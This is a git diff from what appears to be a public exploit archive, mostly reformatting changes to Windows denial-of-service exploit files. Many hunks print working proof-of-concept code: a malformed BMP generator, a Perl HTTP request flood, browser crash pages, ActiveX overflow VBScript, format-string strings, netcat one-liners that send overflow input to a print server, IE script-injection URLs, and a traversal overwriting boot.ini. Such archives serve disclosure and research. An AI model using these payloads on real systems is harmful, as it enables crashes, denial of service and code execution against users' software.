a7f157f69..22c2c692f --- a/platforms/windows/dos/29613.txt +++ b/platforms/windows/dos/29613.txt @@ -61,4 +61,4 @@ open(FILE, ">$file"); print FILE $buffer; close(FILE); print "Exploit file [" . $file . "] created\n"; -print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file +print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file diff --git a/platforms/windows/dos/29618.c b/platforms/windows/dos/29618.c old mode 100755 new mode 100644 index f5a6f815b..a8195853f --- a/platforms/windows/dos/29618.c +++ b/platforms/windows/dos/29618.c @@ -146,6 +146,4 @@ fclose(file); printf("file.nzb generated! Have fun\n"); return 0; -} - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/dos/29659.pl b/platforms/windows/dos/29659.pl index f31d38d72..b190288e0 100755 --- a/platforms/windows/dos/29659.pl +++ b/platforms/windows/dos/29659.pl @@ -19,4 +19,4 @@ print WMF "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; print WMF "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x00\x03\x00"; print WMF "\x00\x00\x00\x00"; close(WMF); -print "Ok\n"; \ No newline at end of file +print "Ok\n"; \ No newline at end of file diff --git a/platforms/windows/dos/2966.html b/platforms/windows/dos/2966.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29660.txt b/platforms/windows/dos/29660.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29664.txt b/platforms/windows/dos/29664.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2967.cs b/platforms/windows/dos/2967.cs old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29671.txt b/platforms/windows/dos/29671.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29707.txt b/platforms/windows/dos/29707.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2972.c b/platforms/windows/dos/2972.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29738.txt b/platforms/windows/dos/29738.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29740.txt b/platforms/windows/dos/29740.txt old mode 100755 new mode 100644 index 6e8158ea0..98de0120d --- a/platforms/windows/dos/29740.txt +++ b/platforms/windows/dos/29740.txt @@ -4,4 +4,4 @@ The 'minigzip' tool is prone to a buffer-overflow vulnerability because it fails A local attacker can exploit this issue to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will result in a denial of service. -minigzip `perl -e 'print 'A'x1050' \ No newline at end of file +minigzip `perl -e 'print 'A'x1050' \ No newline at end of file diff --git a/platforms/windows/dos/29743.txt b/platforms/windows/dos/29743.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29810.c b/platforms/windows/dos/29810.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29816.c b/platforms/windows/dos/29816.c old mode 100755 new mode 100644 index d89420f2a..2e229a9da --- a/platforms/windows/dos/29816.c +++ b/platforms/windows/dos/29816.c @@ -116,4 +116,4 @@ buf2[i+1]=254; i+=255; } writebmp("rle8of4.bmp",16,1,8,1,buf,256,buf2,1000000); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/dos/29818.c b/platforms/windows/dos/29818.c old mode 100755 new mode 100644 index d0a8a3512..cede37b8b --- a/platforms/windows/dos/29818.c +++ b/platforms/windows/dos/29818.c @@ -116,4 +116,4 @@ buf2[i+1]=254; i+=255; } writebmp("rle8of4.bmp",16,1,8,1,buf,256,buf2,1000000); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/dos/29819.c b/platforms/windows/dos/29819.c old mode 100755 new mode 100644 index 1896b93e9..aed885106 --- a/platforms/windows/dos/29819.c +++ b/platforms/windows/dos/29819.c @@ -116,4 +116,4 @@ buf2[i+1]=254; i+=255; } writebmp("rle8of4.bmp",16,1,8,1,buf,256,buf2,1000000); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/dos/29850.txt b/platforms/windows/dos/29850.txt old mode 100755 new mode 100644 index 7afd8389f..9c1b73c0f --- a/platforms/windows/dos/29850.txt +++ b/platforms/windows/dos/29850.txt @@ -11,4 +11,4 @@ Enterprise Security Analyzer 2.5 is reported vulnerable; other versions may also - HMGR_CHECKHOSTSCSV: [ HMGR_CHECKHOSTSCSV&A x 80000...&] - TASKUPDATEDUSER: [TASKUPDATEDUSER&A x 60000...&test&test&] - VERIFYUSERKEY: [VERIFYUSERKEY&A x 13000...&Administrator&127.0.0.1&12345] -- VERIFYPWD: [VERIFYPWD&A x 6000...&admin&adminpass&] \ No newline at end of file +- VERIFYPWD: [VERIFYPWD&A x 6000...&admin&adminpass&] \ No newline at end of file diff --git a/platforms/windows/dos/29860.c b/platforms/windows/dos/29860.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29867.xml b/platforms/windows/dos/29867.xml old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29896.c b/platforms/windows/dos/29896.c old mode 100755 new mode 100644 index 977892f9a..c7c84f3c4 --- a/platforms/windows/dos/29896.c +++ b/platforms/windows/dos/29896.c @@ -1,61 +1,65 @@ +/* source: http://www.securityfocus.com/bid/23629/info Cdelia Software ImageProcessing is prone to a denial-of-service vulnerability because the application fails to handle exceptional conditions. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. +*/ - ********************************** - ## Exploit Coded By Dr.Ninux ## - ## www.LeZr.com ## - ## LeZr.com Security Team ## - ## Dr.Ninux@bsdmail.org ## - ********************************** - ## 24 April 2007 , Tuesday - ## This exploit will create an image (bmp) - ## try to open it with "ImageProcessing" from Cdelia Software co. - ## then the program will be die...! - ********************************** - ## - ## grEEts to: - ## Dr.Virus9,Qptan(Linux_Drox),Q8trojan,BataWeel,SAUDI,RoDhEDoR, - ## Arab4services.com,The_DoN,aseer-alnjoom,Maxy,hacaar...AND milw0rm.com - ## - */ - #include <stdio.h - #include <stdlib.h +/* +********************************** +## Exploit Coded By Dr.Ninux ## +## www.LeZr.com ## +## LeZr.com Security Team ## +## Dr.Ninux@bsdmail.org ## +********************************** +## 24 April 2007 , Tuesday +## This exploit will create an image (bmp) +## try to open it with "ImageProcessing" from Cdelia Software co. +## then the program will be die...! +********************************** +## +## grEEts to: +## Dr.Virus9,Qptan(Linux_Drox),Q8trojan,BataWeel,SAUDI,RoDhEDoR, +## Arab4services.com,The_DoN,aseer-alnjoom,Maxy,hacaar...AND milw0rm.com +## +*/ - #define INV_PIC "die.bmp" +#include <stdio.h +#include <stdlib.h - int main() - { +#define INV_PIC "die.bmp" - int i=0; - char inv_[]="LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL"; - FILE* inv_pic; +int main() +{ - printf("\t\t**********************************\n"); - printf("\t\t ## Exploit Coded By Dr.Ninux ##\n"); - printf("\t\t ## www.LeZr.com ##\n"); - printf("\t\t ## LeZr.com Security Team ##\n"); - printf("\t\t ## Dr.Ninux@bsdmail.org ##\n"); - printf("\t\t**********************************\n"); - printf("\n"); + int i=0; + char inv_[]="LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL"; + FILE* inv_pic; - if((inv_pic=fopen(INV_PIC,"wb"))==NULL) - { - printf("error:foepn().\n"); - exit(0); - } + printf("\t\t**********************************\n"); + printf("\t\t ## Exploit Coded By Dr.Ninux ##\n"); + printf("\t\t ## www.LeZr.com ##\n"); + printf("\t\t ## LeZr.com Security Team ##\n"); + printf("\t\t ## Dr.Ninux@bsdmail.org ##\n"); + printf("\t\t**********************************\n"); + printf("\n"); - printf("[+]Creating |invalid picture| ... plz wait.\n"); + if((inv_pic=fopen(INV_PIC,"wb"))==NULL) + { + printf("error:foepn().\n"); + exit(0); + } - for(i=0;i<sizeof(inv_);i++) - { - fputc(inv_[i],inv_pic); - } + printf("[+]Creating |invalid picture| ... plz wait.\n"); - fclose(inv_pic); - printf("[+]BMP File %s Successfuly Created...\n",INV_PIC); + for(i=0;i<sizeof(inv_);i++) + { + fputc(inv_[i],inv_pic); + } - return 0; - } \ No newline at end of file + fclose(inv_pic); + printf("[+]BMP File %s Successfuly Created...\n",INV_PIC); + + return 0; +} \ No newline at end of file diff --git a/platforms/windows/dos/299.c b/platforms/windows/dos/299.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29937.txt b/platforms/windows/dos/29937.txt old mode 100755 new mode 100644 index e2f2889c4..f30672ab0 --- a/platforms/windows/dos/29937.txt +++ b/platforms/windows/dos/29937.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to execute arbitrary code within the context This issue affects Aventail Connect 4.1.2.13; other versions may also be affected. -ssh $(perl -e 'print 'a'x2200') \ No newline at end of file +ssh $(perl -e 'print 'a'x2200') \ No newline at end of file diff --git a/platforms/windows/dos/29940.html b/platforms/windows/dos/29940.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29942.c b/platforms/windows/dos/29942.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29943.c b/platforms/windows/dos/29943.pl similarity index 60% rename from platforms/windows/dos/29943.c rename to platforms/windows/dos/29943.pl index d52dd0b4c..ab965a860 100755 --- a/platforms/windows/dos/29943.c +++ b/platforms/windows/dos/29943.pl @@ -1,8 +1,8 @@ -source: http://www.securityfocus.com/bid/23778/info - -WebSpeed is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input. - -Successful exploits can allow attackers to cause the application to become unresponsive, denying service to legitimate users. +//source: http://www.securityfocus.com/bid/23778/info +// +//WebSpeed is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input. +// +//Successful exploits can allow attackers to cause the application to become unresponsive, denying service to legitimate users. if(!$ARGV[0]){ print "U.LP.O.W\n"; @@ -15,11 +15,7 @@ if(!$ARGV[0]){ $site = $ARGV[0]; $page = $ARGV[1]; - - print "Attack Started\n"; - - - +print "Attack Started\n"; $ish=1; @@ -35,6 +31,5 @@ print $socket "GET $page HTTP/1.0\r\n"; close($socket); } while ($ish < 1000); - print ":-; Attack Complete\n"; } \ No newline at end of file diff --git a/platforms/windows/dos/29949.c b/platforms/windows/dos/29949.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30023.txt b/platforms/windows/dos/30023.txt old mode 100755 new mode 100644 index 0cd086750..bc329dd77 --- a/platforms/windows/dos/30023.txt +++ b/platforms/windows/dos/30023.txt @@ -10,4 +10,4 @@ http://www.example.com/scripts/cgiip.exe/WService=wsbroker1/dict.r http://www.example.com/scripts/cgiip.exe/WService=wsbroker1/_help.r http://www.example.com/scripts/cgiip.exe/WService=wsbroker1/_dict.r http://www.example.com/scripts/cgiip.exe/WService=wsbroker1/_comp.r -http://www.example.com/scripts/cgiip.exe/WService=wsbroker1/_admin.r \ No newline at end of file +http://www.example.com/scripts/cgiip.exe/WService=wsbroker1/_admin.r \ No newline at end of file diff --git a/platforms/windows/dos/30104.nasl b/platforms/windows/dos/30104.nasl old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30160.txt b/platforms/windows/dos/30160.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30188.txt b/platforms/windows/dos/30188.txt old mode 100755 new mode 100644 index 658c40e38..38f56b6e4 --- a/platforms/windows/dos/30188.txt +++ b/platforms/windows/dos/30188.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to cause denial-of-service conditions on a user Apple Safari for Windows 3 Beta is vulnerable; other versions may also be affected. -'feed://%' \ No newline at end of file +'feed://%' \ No newline at end of file diff --git a/platforms/windows/dos/30193.html b/platforms/windows/dos/30193.html old mode 100755 new mode 100644 index 352e9a979..d291fc317 --- a/platforms/windows/dos/30193.html +++ b/platforms/windows/dos/30193.html @@ -8,4 +8,4 @@ Successful exploits can allow attackers to crash the affected browser, resulting Safari 3.0.1 public beta for Windows is reported vulnerable. -<html><Title>Safari 3.0.1 beta for windows Crash Poc By Lostmon</title> <body> <p>Safari 3.0.1 beta for windows Crash Poc By Lostmon (Lostmon@Gmail.com )</p> <p> Put some number in the second form for crash Safari</p> <form id="historyForm1" method="GET" action="#"> <input type="text" id="currentIndex1" name="currentIndex" value="sss"> <textarea id="historyLocation1" name="historyLocation">&lt;/textarea&gt; <form id="historyForm2" method="GET" action="#"> <input type="text" id="currentIndex2" name="currentIndex"> <textarea id="historyLocation2" name="historyLocation">&lt;/textarea&gt; </form></form></body></html> \ No newline at end of file +<html><Title>Safari 3.0.1 beta for windows Crash Poc By Lostmon</title> <body> <p>Safari 3.0.1 beta for windows Crash Poc By Lostmon (Lostmon@Gmail.com )</p> <p> Put some number in the second form for crash Safari</p> <form id="historyForm1" method="GET" action="#"> <input type="text" id="currentIndex1" name="currentIndex" value="sss"> <textarea id="historyLocation1" name="historyLocation">&lt;/textarea&gt; <form id="historyForm2" method="GET" action="#"> <input type="text" id="currentIndex2" name="currentIndex"> <textarea id="historyLocation2" name="historyLocation">&lt;/textarea&gt; </form></form></body></html> \ No newline at end of file diff --git a/platforms/windows/dos/30194.txt b/platforms/windows/dos/30194.txt old mode 100755 new mode 100644 index 034afedc9..c7cd88dcd --- a/platforms/windows/dos/30194.txt +++ b/platforms/windows/dos/30194.txt @@ -10,4 +10,4 @@ Safari 3.0 and 3.0.1 public beta for Windows are reported vulnerable. NOTE: At the time of writing, Symantec was unable to reproduce this vulnerability. We are investigating this issue further and will update this BID as more information emerges. -<script type='text/javascript'> document.location = ''; </script> \ No newline at end of file +<script type='text/javascript'> document.location = ''; </script> \ No newline at end of file diff --git a/platforms/windows/dos/30208.txt b/platforms/windows/dos/30208.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30255.txt b/platforms/windows/dos/30255.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3030.html b/platforms/windows/dos/3030.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30314.txt b/platforms/windows/dos/30314.txt old mode 100755 new mode 100644 index deadf0ddb..9fc9fd100 --- a/platforms/windows/dos/30314.txt +++ b/platforms/windows/dos/30314.txt @@ -11,4 +11,4 @@ Yahoo! Messenger 8.1 and prior versions are vulnerable. 2. Log in to Yahoo! Messenger 3. Go to the address book tab 4. Place your mouse pointer over the specially crafted address book entry -5. Yahoo! Messenger will immediately crash \ No newline at end of file +5. Yahoo! Messenger will immediately crash \ No newline at end of file diff --git a/platforms/windows/dos/3038.php b/platforms/windows/dos/3038.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30397.txt b/platforms/windows/dos/30397.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3041.html b/platforms/windows/dos/3041.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3042.html b/platforms/windows/dos/3042.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30455.txt b/platforms/windows/dos/30455.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30494.html b/platforms/windows/dos/30494.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30500.txt b/platforms/windows/dos/30500.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30512.txt b/platforms/windows/dos/30512.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3052.c b/platforms/windows/dos/3052.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30544.txt b/platforms/windows/dos/30544.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30550.php b/platforms/windows/dos/30550.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30590.txt b/platforms/windows/dos/30590.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30593.txt b/platforms/windows/dos/30593.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30619.txt b/platforms/windows/dos/30619.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30628.txt b/platforms/windows/dos/30628.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30672.txt b/platforms/windows/dos/30672.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30749.html b/platforms/windows/dos/30749.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30756.html b/platforms/windows/dos/30756.html old mode 100755 new mode 100644 index 0e36fb3c1..7cb314bf2 --- a/platforms/windows/dos/30756.html +++ b/platforms/windows/dos/30756.html @@ -46,4 +46,4 @@ Note: Forms 2.0 ActiveX is distributed with any application that includes Visual </head> <body onLoad="JavaScript: return Check();" /> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/windows/dos/30761.html b/platforms/windows/dos/30761.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30767.html b/platforms/windows/dos/30767.html old mode 100755 new mode 100644 index 2e328cab4..8c196c12f --- a/platforms/windows/dos/30767.html +++ b/platforms/windows/dos/30767.html @@ -4,4 +4,4 @@ Safari for Windows is prone to a buffer overflow that occurs when an attacker en A remote attacker may exploit this issue to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. -<html> <body> <script> var maxbuf = 65474; buff = "A"; for (i=0;i<maxbuf;i++) { buff = buff+"A"; } document.location.hash = buff+"BOW! "; alert(document.location.hash); </script> </body> </html> \ No newline at end of file +<html> <body> <script> var maxbuf = 65474; buff = "A"; for (i=0;i<maxbuf;i++) { buff = buff+"A"; } document.location.hash = buff+"BOW! "; alert(document.location.hash); </script> </body> </html> \ No newline at end of file diff --git a/platforms/windows/dos/30797.html b/platforms/windows/dos/30797.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30805.html b/platforms/windows/dos/30805.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30812.html b/platforms/windows/dos/30812.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30825.html b/platforms/windows/dos/30825.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30832.html b/platforms/windows/dos/30832.html old mode 100755 new mode 100644 index e7714684d..2010c49ae --- a/platforms/windows/dos/30832.html +++ b/platforms/windows/dos/30832.html @@ -6,4 +6,4 @@ An attacker can exploit this issue to trigger denial-of-service conditions in In Yahoo! Toolbar 1.4.1 is vulnerable to this issue; other versions may also be affected. -<html><body> <object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object> <script language=vbscript> arg1=String(517140, "A") target.c arg1 </script> </body></html> \ No newline at end of file +<html><body> <object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object> <script language=vbscript> arg1=String(517140, "A") target.c arg1 </script> </body></html> \ No newline at end of file diff --git a/platforms/windows/dos/30840.txt b/platforms/windows/dos/30840.txt old mode 100755 new mode 100644 index 5f5e257d9..810872322 --- a/platforms/windows/dos/30840.txt +++ b/platforms/windows/dos/30840.txt @@ -10,4 +10,4 @@ The following proof of concept was supplied: <Connection name=> AAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.% x.%x <HostName> BBBBBBBBBB%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.% -x.%x.%x.%x.%x.%x.%x \ No newline at end of file +x.%x.%x.%x.%x.%x.%x \ No newline at end of file diff --git a/platforms/windows/dos/30934.txt b/platforms/windows/dos/30934.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/30936.html b/platforms/windows/dos/30936.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31114.txt b/platforms/windows/dos/31114.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31122.txt b/platforms/windows/dos/31122.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31138.txt b/platforms/windows/dos/31138.txt old mode 100755 new mode 100644 index c4e47a754..a91e04c62 --- a/platforms/windows/dos/31138.txt +++ b/platforms/windows/dos/31138.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex Network Print Server 9.4.2 build 105 and prior versions are affected. -echo LICENSE aaaaa...160...aaaaa|nc SERVER 3114 -v -v \ No newline at end of file +echo LICENSE aaaaa...160...aaaaa|nc SERVER 3114 -v -v \ No newline at end of file diff --git a/platforms/windows/dos/31139.txt b/platforms/windows/dos/31139.txt old mode 100755 new mode 100644 index 6f502069f..72b290ee8 --- a/platforms/windows/dos/31139.txt +++ b/platforms/windows/dos/31139.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex Network Print Server 9.4.2 build 105 and prior versions are affected. -echo USEP %n%n%n%s%s%s|nc SERVER 3114 -v -v \ No newline at end of file +echo USEP %n%n%n%s%s%s|nc SERVER 3114 -v -v \ No newline at end of file diff --git a/platforms/windows/dos/31176.html b/platforms/windows/dos/31176.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31177.html b/platforms/windows/dos/31177.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31178.html b/platforms/windows/dos/31178.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/312.txt b/platforms/windows/dos/312.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31205.txt b/platforms/windows/dos/31205.txt old mode 100755 new mode 100644 index c46b045b1..7980818d5 --- a/platforms/windows/dos/31205.txt +++ b/platforms/windows/dos/31205.txt @@ -8,4 +8,4 @@ Versions in the Sami FTP Server 2.0 series are vulnerable; other versions may al An attacker can use standard FTP clients or network utilities to exploit these issues. -Issuing one of the affected commands followed by 'AA' will trigger a denial of service. \ No newline at end of file +Issuing one of the affected commands followed by 'AA' will trigger a denial of service. \ No newline at end of file diff --git a/platforms/windows/dos/3126.c b/platforms/windows/dos/3126.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3127.c b/platforms/windows/dos/3127.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3128.c b/platforms/windows/dos/3128.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31300.txt b/platforms/windows/dos/31300.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31301.txt b/platforms/windows/dos/31301.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31302.txt b/platforms/windows/dos/31302.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31310.txt b/platforms/windows/dos/31310.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31323.c b/platforms/windows/dos/31323.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31330.txt b/platforms/windows/dos/31330.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31338.txt b/platforms/windows/dos/31338.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31360.txt b/platforms/windows/dos/31360.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31361.txt b/platforms/windows/dos/31361.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31363.txt b/platforms/windows/dos/31363.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31381.txt b/platforms/windows/dos/31381.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31394.txt b/platforms/windows/dos/31394.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31399.txt b/platforms/windows/dos/31399.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3142.html b/platforms/windows/dos/3142.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31461.txt b/platforms/windows/dos/31461.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3155.html b/platforms/windows/dos/3155.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31563.txt b/platforms/windows/dos/31563.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3157.html b/platforms/windows/dos/3157.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31585.c b/platforms/windows/dos/31585.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31592.txt b/platforms/windows/dos/31592.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31593.txt b/platforms/windows/dos/31593.txt old mode 100755 new mode 100644 index 61297fae4..327a16bc9 --- a/platforms/windows/dos/31593.txt +++ b/platforms/windows/dos/31593.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary code in the context of Internet Explorer 8 is vulnerable. Internet Explorer 7 is likely vulnerable as well, but this has not been confirmed. -res://ieframe.dll/acr_error.htm#<h1>foo</h1>,<h1>foo</h1> res://ieframe.dll/acr_error.htm#<iframe/src=''/onload='javascript:document.write("<iframe/src=\"file://localhost/test.txt\"></iframe>")'></iframe>,foo res://ieframe.dll/acr_error.htm#<iframe/src=''/onload='javascript:document.write("<script/src=http://www.example.com/></script>")'></iframe>,foo res://ieframe.dll/acr_error.htm#<iframe/src=''/onload='javascript:document.location="file://..\\ServerName\\pipe\\PipeName"'></iframe>,foo \ No newline at end of file +res://ieframe.dll/acr_error.htm#<h1>foo</h1>,<h1>foo</h1> res://ieframe.dll/acr_error.htm#<iframe/src=''/onload='javascript:document.write("<iframe/src=\"file://localhost/test.txt\"></iframe>")'></iframe>,foo res://ieframe.dll/acr_error.htm#<iframe/src=''/onload='javascript:document.write("<script/src=http://www.example.com/></script>")'></iframe>,foo res://ieframe.dll/acr_error.htm#<iframe/src=''/onload='javascript:document.location="file://..\\ServerName\\pipe\\PipeName"'></iframe>,foo \ No newline at end of file diff --git a/platforms/windows/dos/31629.txt b/platforms/windows/dos/31629.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31656.txt b/platforms/windows/dos/31656.txt old mode 100755 new mode 100644 index 92ecc096f..9d53d5202 --- a/platforms/windows/dos/31656.txt +++ b/platforms/windows/dos/31656.txt @@ -9,4 +9,4 @@ This issue affects ICQ 6 build 6043; other versions may also be vulnerable. ------ |<a href="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"><img src="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" border="0" /></a>| ------- \ No newline at end of file +------ \ No newline at end of file diff --git a/platforms/windows/dos/31696.txt b/platforms/windows/dos/31696.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31707.txt b/platforms/windows/dos/31707.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31711.html b/platforms/windows/dos/31711.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31748.txt b/platforms/windows/dos/31748.txt old mode 100755 new mode 100644 index 90c02b49b..3310d9a8a --- a/platforms/windows/dos/31748.txt +++ b/platforms/windows/dos/31748.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue may allow remote attackers to execute arbitra The issue affects Yahoo! Assistant 3.6 and prior versions. -<object classid='clsid:2283BB66-A15D-4AC8-BA72-9C8C9F5A1691'> \ No newline at end of file +<object classid='clsid:2283BB66-A15D-4AC8-BA72-9C8C9F5A1691'> \ No newline at end of file diff --git a/platforms/windows/dos/31856.html b/platforms/windows/dos/31856.html old mode 100755 new mode 100644 index 01c62d6bb..e577596b9 --- a/platforms/windows/dos/31856.html +++ b/platforms/windows/dos/31856.html @@ -21,4 +21,4 @@ id=&#039;UmxEventCliLib&#039;/&gt; &lt;/object&gt;&lt;script language=&#039;vbscript&#039;&gt; filePath=&quot;..\..\..\..\..\..\..\boot.ini&quot; UmxEventCliLib.SaveToFile filePath -&lt;/script&gt;&lt;/html&gt; \ No newline at end of file +&lt;/script&gt;&lt;/html&gt; \ No newline at end of file diff --git a/platforms/windows/dos/31876.xml b/platforms/windows/dos/31876.xml old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31877.xml b/platforms/windows/dos/31877.xml old mode 100755 new mode 100644 index 2a689b2d8..0d64628d0 --- a/platforms/windows/dos/31877.xml +++ b/platforms/windows/dos/31877.xml @@ -8,4 +8,4 @@ HP Instant Support 1.0.0.22 and earlier versions are affected. NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information. -<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' /> <script language='vbscript'> 'for debugging/custom prolog targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll" prototype = "Property Let RegistryString ( ByVal bstrRegistryKey As String , ByVal bUserKey As Long ) As String" memberName = "RegistryString" progid = "HPISDataManagerLib.Datamgr" argCount = 3 arg1=String(2068, "B") arg2=1 arg3="defaultV" target.RegistryString(arg1 ,arg2 ) = arg3 </script></job></package> \ No newline at end of file +<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' /> <script language='vbscript'> 'for debugging/custom prolog targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll" prototype = "Property Let RegistryString ( ByVal bstrRegistryKey As String , ByVal bUserKey As Long ) As String" memberName = "RegistryString" progid = "HPISDataManagerLib.Datamgr" argCount = 3 arg1=String(2068, "B") arg2=1 arg3="defaultV" target.RegistryString(arg1 ,arg2 ) = arg3 </script></job></package> \ No newline at end of file diff --git a/platforms/windows/dos/31878.xml b/platforms/windows/dos/31878.xml old mode 100755 new mode 100644 index 5fe898cbf..7abf16c83 --- a/platforms/windows/dos/31878.xml +++ b/platforms/windows/dos/31878.xml @@ -8,4 +8,4 @@ HP Instant Support 1.0.0.22 and earlier versions are affected. NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information. -<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' /> <script language='vbscript'> targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll" prototype = "Sub AppendStringToFile ( ByVal 